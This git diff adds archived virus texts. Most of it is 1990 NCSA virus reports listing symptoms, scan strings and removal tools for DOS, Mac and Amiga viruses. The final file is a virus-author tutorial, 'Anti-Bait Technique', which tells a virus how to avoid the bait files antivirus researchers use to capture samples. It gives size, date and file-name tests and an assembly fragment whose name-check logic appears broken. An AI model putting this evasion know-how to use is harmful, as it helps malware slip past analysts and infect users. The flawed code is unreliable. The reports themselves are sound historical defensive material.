@@ -0,0 +1,36 @@ + Ŀ + VIRUS REPORT + TP46VIR. + + +Host Machine: PC compatibles. + + This version looks like TP42VIR, but also attempts to kill the 1701 +virus. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa131.txt b/textfiles.com/virus/NCSA/ncsa131.txt new file mode 100644 index 00000000..6d313c02 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa131.txt 
@@ -0,0 +1,65 @@ + Ŀ + VIRUS REPORT + Typo (Boot infector) + + +Synonyms: Mistake virus + +Date of Origin: June, 1989. + +Place of Origin: Israel. + +Host Machine: PC compatibles. + +Host Files: Remains resident. Infects floppy and hard disk boot sectors. + +Increase in Size of Infected Files: n/a. + +Nature of Damage: Affects system run-time operation. Corrupts or +overwrites boot sector. + +Detected by: Scanv56+, F-Prot, IBM Scan, Pro-Scan. + +Removed by: MDisk, F-Prot, or DOS SYS command. + +Derived from: Ping Pong? + + Typo Boot was first isolated in Israel by Y. Radai in June, 1989. +This virus takes up 2K at the upper end of system memory once it has +become memory resident. + + The virus will swap some characters on printouts with phonemes (for +example, C vs. K), and transpose or substitute digits. Only printouts +are affected. + + Typo Boot may be derived from Ping Pong, because the two have very +similar internal structures. It can be removed from a disk by using +MDisk, CleanUp, DOS SYS command, or just about any Ping Pong +disinfector. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. 
+ + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa132.txt b/textfiles.com/virus/NCSA/ncsa132.txt new file mode 100644 index 00000000..6ed77c40 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa132.txt 
@@ -0,0 +1,85 @@ + Ŀ + VIRUS REPORT + Typo (COM infector) + + +Synonyms: Fumble virus, 867 virus + +Date of Origin: summer, 1989. + +Place of Origin: Israel. + +Host Machine: PC compatibles. + +Host Files: Remains resident. Infects COM files. + +Increase in Size of Infected Files: 867 bytes. + +Nature of Damage: Affects system run-time operation; corrupts program or +overlay files. + +Detected by: Scanv48+, F-Prot, IBM Scan, Pro-Scan. + +Removed by: CleanUp, Scan/D, F-Prot, or delete infected files. + + First detected in Israel during the summer of 1989 (Some experts +attribute first detection to Joe Hirst of Brighton, U.K., in November, +1989.) It creates errors in printouts, by (sometimes) replacing some +characters or digits. It is closely related to the Ping-Pong or Italian +virus, which is one of the most common viruses. In fact, the viruses are +so similar that some anti-virus programs even identify Typo as the +Italian virus. This is not so surprising, since the boot sectors are +almost identical. The differences between the boot sectors are: + +* Some local variables have been moved. For example, the word + containing the location of the original boot sector is now located + two bytes earlier than before. + +* The signature (two bytes that the virus uses to see if a diskette has + already been infected) has been changed. + +* The activation times have been changed. Ping-Pong had an "activation + window" (a second or so long) every half hour. Typo will become active + 112.5 seconds after power-on, and will stay active most of the time. + +* The major differences between the two viruses are in the other part + of the virus code, which is not stored in the boot sector, but in the + cluster the viruses mark as "bad" in the FAT. + + Of course, there are quite a few interesting things the viruses have +in common. For instance, Typo contains the same "bug" as Ping-Pong does, +that prevents it from working on '286 and '386 machines. 
+ + It is possible to remove Typo with some programs designed to remove +Ping-Pong. Since the signature is stored in the same place on both +viruses, it is possible to inoculate diskettes against one of them, but +not both. + + Typo will only infect COM files on even-numbered days. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa133.txt b/textfiles.com/virus/NCSA/ncsa133.txt new file mode 100644 index 00000000..ab9f81b8 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa133.txt 
@@ -0,0 +1,63 @@ + Ŀ + VIRUS REPORT + V2000 + + +Synonyms: Dark Avenger III, Stealth virus, Travel virus + +Date of Origin: February, 1990. + +Place of Origin: Sophia, Bulgaria + +Host Machine: PC compatibles. + +Host Files: Remains resident. Infects COM (including COMMAND.COM), EXE, +and overlay files. + +Increase in Size of Infected Files: 2000 bytes. + +Nature of Damage: Affects system run-time operation. Corrupts program +and overlay files. Corrupts file linkage. + +Detected by: Scanv59+ + +Removed by: Scan/D + +Scan Code: "Zopy me - I want to travel". Also contains "(c) 1989 by +Vesselin Bontchev". + + V2000 may look for and delete any programs written by the Bulgarian +Vesselin Bontchev, and contains a copyright notice for him, suggesting +the virus was written neither by him nor by one of his admirers. + + V2000 can make a mess of things. If V2000 is present in memory, a DIR +command won't show that files have grown in size. CHKDSK/F may produce +crosslinked files. System crashes can occur, and some systems won't +boot, due to the modification of COMMAND.COM or the hidden system files. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. 
+ + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa134.txt b/textfiles.com/virus/NCSA/ncsa134.txt new file mode 100644 index 00000000..6093b538 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa134.txt 
@@ -0,0 +1,83 @@ + Ŀ + VIRUS REPORT + Vacsina + + +Date of Origin: August, 1989. + +Place of Origin: Sophia, Bulgaria. + +Host Machine: PC compatibles. + +Host Files: Remains resident. Infects COM, EXE, SYS, and BIN files. + +OnScreen Symptoms: An infected file may beep when executed. + +Increase in Size of Infected Files: 1206 bytes. + +Nature of Damage: Affects system run-time operation. Corrupts program or +overlay files. + +Detected by: Scanv56+, F-Prot. + +Removed by: CleanUp, Scan/D/A, F-Prot, or delete infected files. + + Synonym: TP04VIR virus. + + Developed in Sophia, Bulgaria, and possibly first reported by +reported by Chris Fischer in Germany in August, 1989. Vacsina takes over +interrupt 21 and connects to COM and EXE files. Vacsina works on +PC/MS-DOS ver. 2.0 or higher. It infects COM files increasing them by +1206 to 1221 bytes (placing the virus code on a paragraph start). It +infects EXE files in two passes: After the first pass the EXE file is 132 +bytes longer; after the second pass its size increases by an aditional +1206 to 1221 bytes. The virus installs a TSR in memory wich will infect +executable files upon loading them (INT 21 subfunction 4B00) using 8208 +bytes of memory. + + The only "function" found so far is an audible alarm or beep(BELL +character) whenever another file is successfully infected. This suggests +that this virus is a "draft", and more is to come. + + Vacsina infects COM files that are bigger than 04B6h bytes and +smaller than F593h bytes and start with a JMP (E9h). Vacsina infects EXE +files if they are smaller than FDB3 bytes (no lower limit). + + The virus is named "vacsina" because it opens a file named VACSINA. It doesn't +check the return status of the open call, and never touches the file +until the end of the virus code, where it closes the file (again ignoring +the return code). 
It is believed that vacsina is a prematurely-escaped +virus (or code built to detect viruses), and that the virus programmer +will add some code in a later version of the virus. + + To detect the original virus, search for the word VACSINA (all +capitals). + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa135.txt b/textfiles.com/virus/NCSA/ncsa135.txt new file mode 100644 index 00000000..80ae3d32 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa135.txt 
@@ -0,0 +1,57 @@ + Ŀ + VIRUS REPORT + Vcomm Virus + + +Synonyms: 637 + +Date of Origin: December, 1989. + +Place of Origin: Poland. + +Host Machine: PC compatibles. + +Host Files: Memory resident. Infects EXE files. + +Increase in Size of Infected Files: 637 bytes. + +Nature of Damage: Corrupts program files. + +Detected by: F-Prot, Scanv60+, IBM Scan, Pro-Scan. + +Removed by: F-Prot, Scan/D, or delete infected files. + + When an infected file is run, Vcomm attempts to infect one EXE file +in the current directory. During infection, Vcomm first pads the file so +that the file's length to a multiple of 512 bytes, then it adds its 637 +bytes of virus code to the end of the file. + + The memory resident portion of the virus intercepts any disk writes +that are attempted, and changes them into disk reads. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 
diff --git a/textfiles.com/virus/NCSA/ncsa136.txt b/textfiles.com/virus/NCSA/ncsa136.txt new file mode 100644 index 00000000..ec4b17fd --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa136.txt 
@@ -0,0 +1,78 @@ + Ŀ + VIRUS REPORT + Vienna + + +Synonyms: Austrian, One in Eight, DOS-62, DOS-68, 648, UNESCO virus. + +Date of Origin: December, 1987. + +Place of Origin: Vienna, Austria. + +Host Machine: PC compatibles. + +Host Files: COMMAND.COM, COM files. + +Increase in Size of Infected Files: 648 bytes. + +Nature of Damage: Corrupts program or overlay files. + +Detected by: Scanv56+, F-Prot. + +Removed by: M-VIENNA, CleanUp, VirClean, F-Prot.. + +Scan Code: You can search at offset 005H for 8B F2 83 C6 0A 90 BF 00 01 +B9. + +History: The virus was first detected in Vienna in December, 1987. In +April, 1988, this virus surfaced in Moscow at a children's summer +computer camp run by UNESCO. Someone who didn't know of its prior +existence in Austria gave it the name DOS-62, presumably because its +method of indicating an already infected file is to set the seconds field +of the time entry of the file to 62. + +Description of Operation: This virus is a memory resident virus. It +infects COM files (including COMMAND.COM) as they are loaded and +executed. The infected files increase in size by approximately 648 +bytes. Some infected programs will not run. + + The first three bytes of the program are stored in the virus, and +replaced by a branch to the beginning of the virus. The virus looks for, +and infects, one COM file - either in the current directory or in one of +the directories on the PATH. + + One in eight files infected does not get a copy of the virus. +Instead the first five bytes of the program are replaced by a far jump to +the BIOS initialization routine. That is, in one out of eight attempted +infections, the system will perform a warm reboot when the infected +program is run. + +Removal: To remove the virus, follow the instructions provided for the +Jerusalem virus or run M-VIENNA. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. 
It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa137.txt b/textfiles.com/virus/NCSA/ncsa137.txt new file mode 100644 index 00000000..b00c18f8 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa137.txt 
@@ -0,0 +1,56 @@ + Ŀ + VIRUS REPORT + Vienna-B + + +Synonyms: 62-B + +Host Machine: PC compatibles. + +Host Files: COM files. + +Increase in Size of Infected Files: 648 bytes. + +Nature of Damage: Corrupts COM files. + +Detected by: Scanv56+, F-Prot, IBM Scan, Pro-Scan. + +Removed by: CleanUp, M-Vienna, VirClean, F-Prot. + +Derived from: Vienna. + +Scan Code: You can search at offset 005H for 8B F2 81 C6 0A 00 BF 00 01 +B9. + +Description of Operation: This virus is similar to Vienna/DOS-62 except +the re-boot is replaced by deleting the executed program. In another +variation of this virus, an error has been introduced which disables the +virus's ability to search through the PATH, and the far jump has been +replaced by five spaces. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa138.txt b/textfiles.com/virus/NCSA/ncsa138.txt new file mode 100644 index 00000000..534d1db6 --- /dev/null 
+++ b/textfiles.com/virus/NCSA/ncsa138.txt @@ -0,0 +1,52 @@ + Ŀ + VIRUS REPORT + Virus-90 + + +Date of Origin: December, 1989. + +Place of Origin: Washington, DC + +Host Machine: PC compatibles. + +Host Files: Remains resident; infects COM files. + +Increase in Size of Infected Files: 857 bytes. + +Nature of Damage: Corrupts program files. + +Detected by: Scanv53+, F-Prot, IBM Scan. + +Removed by: CleanUp, Scan/D, F-Prot, or delete the infected files. + + Virus-90 virus was written by Patrick Toulme and sold for a time as +an "educational tool". In January, 1990, Toulme contacted the sites +where he had uploaded the virus and asked that they remove it from their +systems. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa139.txt b/textfiles.com/virus/NCSA/ncsa139.txt new file mode 100644 index 00000000..5a07b5f0 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa139.txt 
@@ -0,0 +1,57 @@ + Ŀ + VIRUS REPORT + Virus101 + + +Date of Origin: January, 1990. + +Place of Origin: Washington, DC + +Host Machine: PC compatibles. + +Host Files: Remains resident. Infects all executable files and boot +sector on a floppy. + +Increase in Size of Infected Files: 2,560 bytes. + +Nature of Damage: Corrupts program files, boot sector. + +Detected by: Scanv57+. + +Removed by: Scan/D or delete the infected files. + +Derived from: Virus90. + + Virus101 is the descendent of Virus-90, also written by Patrick +Toulme as an "educational tool". The virus employs an encryption scheme +to avoid detection. It infects COMMAND.COM and all other executable file +types (COM, EXE, overlay). Once it has infected all the files on a +diskette, it will infect the diskette's boot sector. The current version +only infects floppy disks. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 
diff --git a/textfiles.com/virus/NCSA/ncsa140.txt b/textfiles.com/virus/NCSA/ncsa140.txt new file mode 100644 index 00000000..4a21d07f --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa140.txt @@ -0,0 +1,51 @@ + Ŀ + VIRUS REPORT + W13 + + +Date of Origin: December, 1989. + +Place of Origin: Poland. + +Host Machine: PC compatibles. + +Host Files: Non-resident. Infects COM files. + +Increase in Size of Infected Files: 507 or 534 bytes. + +Nature of Damage: Corrupts program files. + +Detected by: F-Prot, IBM Scan. + +Removed by: F-Prot or delete the infected files. + + W13 doesn't do much except infect files. One variety is 534 bytes in +length, and the second is 507 bytes long. The 507 byte variety is derived +from the 534 variety, correcting some bugs in 534. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa141.txt b/textfiles.com/virus/NCSA/ncsa141.txt new file mode 100644 index 00000000..631f16b1 --- /dev/null 
+++ b/textfiles.com/virus/NCSA/ncsa141.txt @@ -0,0 +1,43 @@ + Ŀ + VIRUS REPORT + WDEF + + +Date of Origin: December, 1989? + +Host Machine: Macintosh. + +Host Files: floppy and hard disk files. + +Detected by: Gatekeeper Aid 1.0.1, Anti-Virus Kit, Disinfectant 1.5 + +Removed by: Gatekeeper Aid 1.0.1, Anti-Virus Kit, Disinfectant 1.5 + + Virus Detective 3.0.1 does not seem effective with this. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa142.txt b/textfiles.com/virus/NCSA/ncsa142.txt new file mode 100644 index 00000000..98662e19 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa142.txt 
@@ -0,0 +1,51 @@ + Ŀ + VIRUS REPORT + XENO + + +Synonyms: 2608 virus + +Date of Origin: October, 1989 + +Place of Origin: Vancouver, BC, Canada + +Host Machine: Amiga. + +Host Files: non-boot sector virus. + +Description of Operation: Works like the IRQ virus, attaching itself to +the first executable in the startup-sequence. However, it copies the +found executable to devs:" " and copies itself into the old name in the +"C" directory (size 2608 bytes). Whenever the command is executed it +calls the virus which in turn would call the REAL command, thus giving +the appearance that all is well. + + On about every fifth warm boot, the virus displays a message briefly, +containing the words "Virus Exterminator..." + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa143.txt b/textfiles.com/virus/NCSA/ncsa143.txt new file mode 100644 index 00000000..bfd615be --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa143.txt 
@@ -0,0 +1,88 @@ + Ŀ + VIRUS REPORT + Yankee Doodle + + +Date of Origin: September 30, 1989. + +Place of Origin: Sofia, Bulgaria. + +Host Machine: PC compatibles. + +Host Files: Remains resident. Infects COM, EXE files. + +OnScreen Symptoms: Plays "Yankee Doodle" on the system speaker some time +after loading. + +Increase in Size of Infected Files: 2885 or 2899 bytes. + +Nature of Damage: Affects system run-time operation. Corrupts COM and +EXE files. + +Detected by: Scanv42+, F-Prot. + +Removed by: CleanUp, Scan/D, VirClean, F-Prot, or delete infected files. + + This virus was written by Wladimir Bochev from Sofia, Bulgaria, as an +intellectual exercise. It was discovered in Vienna by Alexander Holy at +the United Nation's North Atlantic Project office on Sept 30th, 1989. +The virus has reportedly been transmitted to the U.S. through U.N. +employees via the game "Outrun". + + The virus plays the tune "Yankee Doodle Dandy" on the system's +speaker either when the program is loaded, or 17 hours after an infected +program is loaded, depending on the version of Yankee Doodle. Both COM +and EXE files of any size can be infected, and the virus willingly +infects every such file. + + Infected files grow in size by 2899 bytes. Infected files can be +recognized by the string "motherfucker" at their ends. In the early +versions, there was no damage caused by the virus. In fact, the virus was +apparently designed as a virus fighter. It will seek out and modify Ping +Pong viruses, changing them so that they self-destruct after 100 +infections. Subsequent strains may format the hard disk. Several +variations on the Yankee Doodle virus have been identified. See entries +for: + +* TP25VIR + +* TP33VIR + +* TP34VIR + +* TP38VIR + +* TP42VIR + +* TP44VIR + +* TP46VIR + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. 
To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa144.txt b/textfiles.com/virus/NCSA/ncsa144.txt new file mode 100644 index 00000000..914e4874 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa144.txt 
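Review bot: the Yankee Doodle report contradicts itself on the size delta, which is the one field a responder would use for triage: the header reads `Increase in Size of Infected Files: 2885 or 2899 bytes.` while the body states `Infected files grow in size by 2899 bytes.` The body should either mention the 2885-byte variant as well or say which of the listed variants (TP25VIR through TP46VIR) each figure belongs to, so the two statements can be reconciled.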
@@ -0,0 +1,42 @@ + Ŀ + VIRUS REPORT + Yankee Doodle-2 Virus + + +Host Machine: PC compatibles. + +Host Files: Remains resident. Infects EXE files only. + +OnScreen Symptoms: Plays "Yankee Doodle" on the system speaker as soon +as an infected program is executed. + +Nature of Damage: Affects system run-time operation. Corrupts EXE files. + +Detected by: Scanv62+. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/abaittut.txt b/textfiles.com/virus/abaittut.txt new file mode 100644 index 00000000..0987de28 --- /dev/null +++ b/textfiles.com/virus/abaittut.txt 
@@ -0,0 +1,356 @@ + Anti-Bait Technique + ~~~~~~~~~~~~~~~~~~~ + + -HATE-YOUR-ENEMIES- + + By using the methods explained in the previous section, we can +safely say that the AV can not simply set the bait maker to generate +10,000 bait files, with the virus in memory, and get an accurate and +complete of what is necessary. Instead they must use many varying files, +reboot the system thousands of times to change the date, and fiddle with +the generation counter, which will significantly slow things down. But +let us take things a step further: let us imagine that the virus won't +even infect the files in the first place. This would simply involve +putting the candidate file through a number of tests, and if it fails +any of them, saying the file could be a bait, and not infecting them. +This section simply looks at what some of these test could entail. + + + Anti-Bait Techniques: The Obvious + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + The are two very obvious and easy test your virus _SHOULD_ have: + + 1. It should not infect new files. + 2. It should not infect small files. + + New files should not be infected, as the files created by a bait +maker will usually look new. Simply grab the current date, and compare +it to the date stamp of the file. It is the same? Well then dont infect! +It should be noted that this is easilly defeated, if the bait maker sets +the files date stamp to a random date, before closing it. + + The files created by bait makers, will usually be fairly small, +so small files should be avoided. I would recommend that you avoid files +smaller then between 5,000 and 10,000 bytes. The smaller you make this +limit, the less chance there is that a legitimate file will be wrongly +be left uninfected, but it is also more likely that a bad bait file will +wrongly be infected. 
By making the limit larger, the greater the chance +there is that a legitimate file will be wrongly be left uninfected, but +its also more likely that a bait file will correctly be left uninfected. +High limit or Low limit? The choice is yours... This could easilly be +defeated if the bait maker created files which were, say, 50,000 bytes. +This size is obviously far to large to avoid, as it is larger then many +legitimate programs. You should also remember however that 10,240 files +at 5,000 bytes will use 52 megabytes, so if the bait files were 50,000 +bytes long, this figure would go upto 520 megabytes! Most test computers +do not have such lard hard drives, so it is safe to assume that the bait +files will be small. + + As the above two methods are so easy to implement, I will not +bother to supply any example code. + + + Anti-Bait Techniques: Avoid Digital File Names + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + Most bait makers create filenames like '00000000.com' followed +by '00000001.com'. All the file are names composed of the characters '0' +to '9'. We could have a check in our virus, to ensure that this is not +true, and if it is, not infect the file, as shown below: +------------------------------------------------------------------------ + +;This code avoids file names composed entirely of digits. It is assumed +;that the file has already been opened, and that its file handle is in +;BX. get_sft_bx is assumed to be a sub-procedure that returns ES:DI pointing +;to the SFT entry of the handle in BX (the file to be infected). + + call get_sft_bx + mov si,di + add si,20 ;File names in at offset 20h of SFT + mov cx,8 ;8 characters in name (padded with spaces) + cld ;increment SI on LODSB + +check_name: + es:lodsb + cmp al,'0' + jb name_safe + cmp al,'9' + ja name_safe ;character is not digit, so it is safe + + cmp al,20 ;check for space if equal, end of name has + je not_safe ;been reached, with only digits encounters. 
